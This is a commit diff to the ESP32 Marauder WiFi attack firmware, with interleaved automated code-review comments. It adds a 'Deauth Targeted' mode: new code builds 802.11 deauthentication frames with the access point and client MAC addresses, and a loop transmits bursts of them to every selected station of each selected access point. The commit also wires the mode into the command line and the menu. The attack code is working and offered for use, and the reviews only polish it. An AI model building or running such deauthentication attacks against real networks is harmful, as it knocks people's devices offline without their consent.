Add command to attack stations

This commit is contained in:
Just Call Me Koko
2022-12-22 15:21:54 -05:00
parent e54e291bfd
commit 7d64840128
7 changed files with 140 additions and 43 deletions


@@ -3,7 +3,7 @@
<!---[![Build Status](https://travis-ci.com/justcallmekoko/ESP32Marauder.svg?branch=master)](https://travis-ci.com/justcallmekoko/ESP32Marauder)--->
<!---Shields/Badges https://shields.io/--->
# ESP32 Marauder v0.9.20
# ESP32 Marauder v0.10.0
<p align="center"><img alt="Marauder logo" src="https://github.com/justcallmekoko/ESP32Marauder/blob/master/pictures/marauder3L.jpg?raw=true" width="300"></p>
<p align="center">
<b>A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32</b>


@@ -109,11 +109,8 @@ void CommandLine::runCommand(String input) {
Serial.println(HELP_CH_CMD);
Serial.println(HELP_SETTINGS_CMD);
Serial.println(HELP_CLEARAP_CMD_A);
Serial.println(HELP_CLEARAP_CMD_B);
Serial.println(HELP_CLEARAP_CMD_C);
Serial.println(HELP_REBOOT_CMD);
Serial.println(HELP_UPDATE_CMD_A);
Serial.println(HELP_UPDATE_CMD_B);
// WiFi sniff/scan
Serial.println(HELP_SCANAP_CMD);
@@ -361,6 +358,7 @@ void CommandLine::runCommand(String input) {
int ap_beacon_sw = this->argSearch(&cmd_args, "-a");
int src_addr_sw = this->argSearch(&cmd_args, "-s");
int dst_addr_sw = this->argSearch(&cmd_args, "-d");
int targ_sw = this->argSearch(&cmd_args, "-c");
if (attack_type_switch == -1) {
Serial.println("You must specify an attack type");
@@ -372,14 +370,21 @@ void CommandLine::runCommand(String input) {
// Branch on attack type
// Deauth
if (attack_type == ATTACK_TYPE_DEAUTH) {
if (dst_addr_sw == -1) {
// Default to broadcast
if ((dst_addr_sw == -1) && (targ_sw == -1)) {
Serial.println("Sending to broadcast...");
wifi_scan_obj.dst_mac = "ff:ff:ff:ff:ff:ff";
}
else {
// Dest addr specified
else if (dst_addr_sw != -1) {
wifi_scan_obj.dst_mac = cmd_args.get(dst_addr_sw + 1);
Serial.println("Sending to " + wifi_scan_obj.dst_mac + "...");
}
// Station list specified
else if (targ_sw != -1)
Serial.println("Sending to Station list");
// Source addr not specified
if (src_addr_sw == -1) {
if (!this->apSelected()) {
Serial.println("You don't have any targets selected. Use " + (String)SEL_CMD);
@@ -390,8 +395,14 @@ void CommandLine::runCommand(String input) {
menu_function_obj.drawStatusBar();
#endif
Serial.println("Starting Deauthentication attack. Stop with " + (String)STOPSCAN_CMD);
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH, TFT_RED);
// Station list not specified
if (targ_sw == -1)
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH, TFT_RED);
// Station list specified
else
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH_TARGETED, TFT_ORANGE);
}
// Source addr specified
else {
String src_mac_str = cmd_args.get(src_addr_sw + 1);
sscanf(src_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx",
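Review bot: When both `-d` and `-c` are passed, the message branch at the top of the deauth block takes the `-d` path (`else if (dst_addr_sw != -1)`), sets `wifi_scan_obj.dst_mac` and prints `Sending to <mac>...`, but the dispatch at the bottom tests only `targ_sw` and starts `WIFI_ATTACK_DEAUTH_TARGETED`, so the announced destination is never used. The two decisions should come from one condition; the simplest fix is to reject the combination before the branch, e.g. `if ((dst_addr_sw != -1) && (targ_sw != -1)) { Serial.println("Specify either -d or -c, not both"); return; }`. The braceless `else if (targ_sw != -1)` next to the braced siblings is also easy to misread when a second statement is added later. `runCommand` starts and ends outside this hunk.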


@@ -70,12 +70,9 @@ const char PROGMEM BT_SKIM_CMD[] = "sniffskim";
// Admin
const char PROGMEM HELP_HEAD[] = "============ Commands ============";
const char PROGMEM HELP_CH_CMD[] = "channel [-s <channel>]";
const char PROGMEM HELP_CLEARAP_CMD_A[] = "clearlist -a";
const char PROGMEM HELP_CLEARAP_CMD_B[] = "clearlist -s";
const char PROGMEM HELP_CLEARAP_CMD_C[] = "clearlist -c";
const char PROGMEM HELP_CLEARAP_CMD_A[] = "clearlist -a/-c/-s";
const char PROGMEM HELP_REBOOT_CMD[] = "reboot";
const char PROGMEM HELP_UPDATE_CMD_A[] = "update -s";
const char PROGMEM HELP_UPDATE_CMD_B[] = "update -w";
const char PROGMEM HELP_UPDATE_CMD_A[] = "update -s/-w";
const char PROGMEM HELP_SETTINGS_CMD[] = "settings [-s <setting> enable/disable>]/[-r]";
// WiFi sniff/scan
@@ -91,7 +88,7 @@ const char PROGMEM HELP_SNIFF_PMKID_CMD[] = "sniffpmkid [-c <channel>]";
const char PROGMEM HELP_STOPSCAN_CMD[] = "stopscan";
// WiFi attack
const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-s <src mac>] [-d <dst mac>]/probe/rickroll>";
const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-c]/[-s <src mac>] [-d <dst mac>]/probe/rickroll>";
// WiFi Aux
const char PROGMEM HELP_LIST_AP_CMD_A[] = "list -s";
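Review bot: The new usage text `deauth [-c]/[-s <src mac>] [-d <dst mac>]` reads as if `-c` were an alternative to `-s`, whereas in the command handler `-c` stands in for the `-d` destination (selected station list instead of one MAC) and `-s` stays independent. Suggest `deauth [-c | -d <dst mac>] [-s <src mac>]` so the bracket grouping matches the parsing. The string is user-visible only, so nothing else changes.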


@@ -889,6 +889,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_TARGETED) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_MIMIC) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_RICK_ROLL))
display_obj.displayBuffer();
@@ -898,7 +899,6 @@ void MenuFunctions::main(uint32_t currentTime)
int pre_getTouch = millis();
// getTouch causes a 10ms delay which makes beacon spam less effective
//if (wifi_scan_obj.currentScanMode == WIFI_SCAN_OFF)
#ifndef MARAUDER_MINI
pressed = display_obj.tft.getTouch(&t_x, &t_y);
#endif
@@ -928,13 +928,13 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_MIMIC) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
{
//Serial.println("Stopping scan...");
wifi_scan_obj.StartScan(WIFI_SCAN_OFF);
// If we don't do this, the text and button coordinates will be off
@@ -977,6 +977,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_MIMIC) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
@@ -986,7 +987,6 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_SCAN_ACTIVE_EAPOL) ||
(wifi_scan_obj.currentScanMode == WIFI_PACKET_MONITOR))
{
//Serial.println("Stopping scan...");
wifi_scan_obj.StartScan(WIFI_SCAN_OFF);
// If we don't do this, the text and button coordinates will be off
@@ -1013,9 +1013,9 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_TARGETED) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_MIMIC) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_RICK_ROLL))
//(wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_LIST))
{
// Need this to set all keys to false
for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++) {
@@ -1030,8 +1030,6 @@ void MenuFunctions::main(uint32_t currentTime)
for (uint8_t b = 0; b < current_menu->list->size(); b++) {
display_obj.tft.setFreeFont(MENU_FONT);
if (display_obj.key[b].justPressed()) {
//display_obj.key[b].drawButton2(current_menu->list->get(b).name, true); // draw invert
//display_obj.key[b].drawButton(ML_DATUM, BUTTON_PADDING, current_menu->list->get(b).name, true);
display_obj.key[b].drawButton(true, current_menu->list->get(b).name);
if (current_menu->list->get(b).name != text09)
display_obj.tft.drawXBitmap(0,
@@ -1042,14 +1040,10 @@ void MenuFunctions::main(uint32_t currentTime)
current_menu->list->get(b).color,
TFT_BLACK);
}
//else if (pressed)
// display_obj.key[b].drawButton(false, current_menu->list->get(b).name);
// If button was just release, execute the button's function
if ((display_obj.key[b].justReleased()) && (!pressed))
{
//display_obj.key[b].drawButton2(current_menu->list->get(b).name); // draw normal
//display_obj.key[b].drawButton(ML_DATUM, BUTTON_PADDING, current_menu->list->get(b).name);
display_obj.key[b].drawButton(false, current_menu->list->get(b).name);
current_menu->list->get(b).callable();
}
@@ -1671,6 +1665,11 @@ void MenuFunctions::RunSetup()
this->drawStatusBar();
wifi_scan_obj.StartScan(WIFI_ATTACK_AP_SPAM, TFT_MAGENTA);
});
addNodes(&wifiAttackMenu, text_table1[62], TFT_RED, NULL, DEAUTH_SNIFF, [this]() {
display_obj.clearScreen();
this->drawStatusBar();
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH_TARGETED, TFT_ORANGE);
});
//addNodes(&wifiAttackMenu, "AP Mimic Flood", TFT_PURPLE, NULL, DEAUTH_SNIFF, [this]() {
// display_obj.clearScreen();
// this->drawStatusBar();
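Review bot: `WIFI_ATTACK_DEAUTH_TARGETED` has to be added by hand to four mode lists inside `MenuFunctions::main` (the `!=` chain before `displayBuffer()`, the two `==` chains that stop a scan, and the `!=` chain before the button loop) and to a fifth in `WiFiScan::StopScan`, and omitting one silently leaves the mode out of that path. A predicate owned by `WiFiScan`, e.g. `bool isAttackMode(uint8_t mode) const`, used in those conditions would make the next mode a one-line change; the lists are not identical (some also carry `WIFI_ATTACK_BEACON_LIST` and the BT modes), so it may take two such predicates rather than one. The duplication predates this commit, but this change shows its cost. `MenuFunctions::main` extends beyond every hunk shown here.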


@@ -324,6 +324,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
this->startWiFiAttacks(scan_mode, color, text_table4[8]);
else if (scan_mode == WIFI_ATTACK_DEAUTH_MANUAL)
this->startWiFiAttacks(scan_mode, color, text_table4[8]);
else if (scan_mode == WIFI_ATTACK_DEAUTH_TARGETED)
this->startWiFiAttacks(scan_mode, color, text_table4[47]);
else if (scan_mode == WIFI_ATTACK_AP_SPAM)
this->startWiFiAttacks(scan_mode, color, " AP Beacon Spam ");
else if (scan_mode == BT_SCAN_ALL) {
@@ -463,6 +465,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
(currentScanMode == WIFI_ATTACK_AUTH) ||
(currentScanMode == WIFI_ATTACK_DEAUTH) ||
(currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
(currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) ||
(currentScanMode == WIFI_ATTACK_MIMIC) ||
(currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(currentScanMode == WIFI_PACKET_MONITOR) ||
@@ -2354,24 +2357,6 @@ void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t
}
}
/*
void WiFiScan::broadcastAPBeacon(uint32_t currentTime, AccessPoint custom_ssid) {
set_channel = random(1,12);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Randomize SRC MAC
packet[10] = packet[16] = custom_ssid.bssid[0];
packet[11] = packet[17] = custom_ssid.bssid[1];
packet[12] = packet[18] = custom_ssid.bssid[2];
packet[13] = packet[19] = custom_ssid.bssid[3];
packet[14] = packet[20] = custom_ssid.bssid[4];
packet[15] = packet[21] = custom_ssid.bssid[5];
char ESSID[custom_ssid.essid.length() + 1] = {};
custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
}*/
void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid) {
set_channel = random(1,12);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
@@ -2638,6 +2623,70 @@ void WiFiScan::sendProbeAttack(uint32_t currentTime) {
}
}
void WiFiScan::sendDeauthFrame(int bssid[6], int channel, uint8_t mac[6]) {
WiFiScan::set_channel = channel;
esp_wifi_set_channel(channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Build AP source packet
deauth_frame_default[4] = mac[0];
deauth_frame_default[5] = mac[1];
deauth_frame_default[6] = mac[2];
deauth_frame_default[7] = mac[3];
deauth_frame_default[8] = mac[4];
deauth_frame_default[9] = mac[5];
deauth_frame_default[10] = bssid[0];
deauth_frame_default[11] = bssid[1];
deauth_frame_default[12] = bssid[2];
deauth_frame_default[13] = bssid[3];
deauth_frame_default[14] = bssid[4];
deauth_frame_default[15] = bssid[5];
deauth_frame_default[16] = bssid[0];
deauth_frame_default[17] = bssid[1];
deauth_frame_default[18] = bssid[2];
deauth_frame_default[19] = bssid[3];
deauth_frame_default[20] = bssid[4];
deauth_frame_default[21] = bssid[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
// Build AP dest packet
deauth_frame_default[4] = bssid[0];
deauth_frame_default[5] = bssid[1];
deauth_frame_default[6] = bssid[2];
deauth_frame_default[7] = bssid[3];
deauth_frame_default[8] = bssid[4];
deauth_frame_default[9] = bssid[5];
deauth_frame_default[10] = mac[0];
deauth_frame_default[11] = mac[1];
deauth_frame_default[12] = mac[2];
deauth_frame_default[13] = mac[3];
deauth_frame_default[14] = mac[4];
deauth_frame_default[15] = mac[5];
deauth_frame_default[16] = mac[0];
deauth_frame_default[17] = mac[1];
deauth_frame_default[18] = mac[2];
deauth_frame_default[19] = mac[3];
deauth_frame_default[20] = mac[4];
deauth_frame_default[21] = mac[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
}
void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str) {
// Itterate through all access points in list
// Check if active
@@ -3508,6 +3557,43 @@ void WiFiScan::main(uint32_t currentTime)
packets_sent = 0;
}
}
else if (currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) {
// Loop through each AP
for (int x = 0; x < access_points->size(); x++) {
// Only get selected APs
if (access_points->get(x).selected) {
AccessPoint cur_ap = access_points->get(x);
// Loop through each AP's Station
for (int i = 0; i < cur_ap.stations->size(); i++) {
// Only get selected Stations
if (stations->get(cur_ap.stations->get(i)).selected) {
Station cur_sta = stations->get(cur_ap.stations->get(i));
// Send deauths for each selected AP's selected Station
for (int y = 0; y < 25; y++)
this->sendDeauthFrame(cur_ap.bssid, cur_ap.channel, cur_sta.mac);
// Display packets sent on screen
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, 160);
display_obj.showCenterText(displayString, 160);
#endif
packets_sent = 0;
}
}
}
}
}
}
else if ((currentScanMode == WIFI_ATTACK_MIMIC)) {
// Need this for loop because getTouch causes ~10ms delay
// which makes beacon spam less effective
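Review bot: The new `sendDeauthFrame(int bssid[6], int channel, uint8_t mac[6])` overload takes the BSSID as `int[6]` while the existing overload beside it takes `uint8_t bssid[6]`, and every `deauth_frame_default[...] = bssid[i]` store narrows `int` into what is presumably a byte buffer without a cast; the declaration added to WiFiScan.h carries the same mismatch. If `AccessPoint::bssid` really is `int[6]` (the call `this->sendDeauthFrame(cur_ap.bssid, cur_ap.channel, cur_sta.mac)` suggests so, but the struct is not in this diff), keep both overloads on one element type, or at least make the narrowing explicit with `static_cast<uint8_t>(bssid[i])`. In the `WIFI_ATTACK_DEAUTH_TARGETED` branch of `WiFiScan::main`, the padding loop `for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)` redeclares `x` inside the AP loop that already iterates on `x`; it only shadows, but renaming it (e.g. `p`) avoids a `-Wshadow` warning and a misread. `WiFiScan::main` extends beyond the hunk on both sides.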


@@ -66,6 +66,7 @@
#define WIFI_ATTACK_DEAUTH_MANUAL 24
#define WIFI_SCAN_RAW_CAPTURE 25
#define WIFI_SCAN_STATION 26
#define WIFI_ATTACK_DEAUTH_TARGETED 27
#define GRAPH_REFRESH 100
@@ -246,6 +247,7 @@ class WiFiScan
void sendProbeAttack(uint32_t currentTime);
void sendDeauthAttack(uint32_t currentTime, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
void sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
void sendDeauthFrame(int bssid[6], int channel, uint8_t mac[6]);
void broadcastRandomSSID(uint32_t currentTime);
void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid);


@@ -100,6 +100,7 @@ PROGMEM const char text1_58[] = "Raw Capture";
PROGMEM const char text1_59[] = "Station Sniff";
PROGMEM const char text1_60[] = "Clear Stations";
PROGMEM const char text1_61[] = "Select Stations";
PROGMEM const char text1_62[] = "Deauth Targeted";
//SDInterface.cpp texts
@@ -175,12 +176,13 @@ PROGMEM const char text4_43[] = "Scanning for\nBluetooth-enabled skimmers\nHC-03
PROGMEM const char text4_44[] = " AP Scan ";
PROGMEM const char text4_45[] = "Clearing Stations...";
PROGMEM const char text4_46[] = "Stations Cleared: ";
PROGMEM const char text4_47[] = "Targeted Deauth";
//Making tables
PROGMEM const char *text_table0[] = {text0_0,text0_1, text0_2, text0_3, text0_4, text0_5, text0_6, text0_7, text0_8};
PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56,text1_57,text1_58,text1_59,text1_60,text1_61};
PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56,text1_57,text1_58,text1_59,text1_60,text1_61,text1_62};
PROGMEM const char *text_table2[] = {text2_0,text2_1,text2_2,text2_3,text2_4,text2_5,text2_6,text2_7,text2_8,text2_9,text2_10,text2_11,text2_12,text2_13,text2_14};
PROGMEM const char *text_table3[] = {text3_0,text3_1,text3_2,text3_3,text3_4,text3_5};
PROGMEM const char *text_table4[] = {text4_0,text4_1,text4_2,text4_3,text4_4,text4_5,text4_6,text4_7,text1_54,text4_9,text4_10,text4_11,text4_12,text4_13,text4_14,text4_15,text4_16,text4_17,text4_18,text4_19,text4_20,text4_21,text4_22,text4_23,text4_24,text4_25,text4_26,text4_27,text4_28,text4_29,text4_30,text4_31,text4_32,text4_33,text4_34,text4_35,text4_36,text4_37,text4_38,text4_39,text4_40,text4_41,text4_42,text4_43,text4_44,text4_45,text4_46};
PROGMEM const char *text_table4[] = {text4_0,text4_1,text4_2,text4_3,text4_4,text4_5,text4_6,text4_7,text1_54,text4_9,text4_10,text4_11,text4_12,text4_13,text4_14,text4_15,text4_16,text4_17,text4_18,text4_19,text4_20,text4_21,text4_22,text4_23,text4_24,text4_25,text4_26,text4_27,text4_28,text4_29,text4_30,text4_31,text4_32,text4_33,text4_34,text4_35,text4_36,text4_37,text4_38,text4_39,text4_40,text4_41,text4_42,text4_43,text4_44,text4_45,text4_46,text4_47};
#endif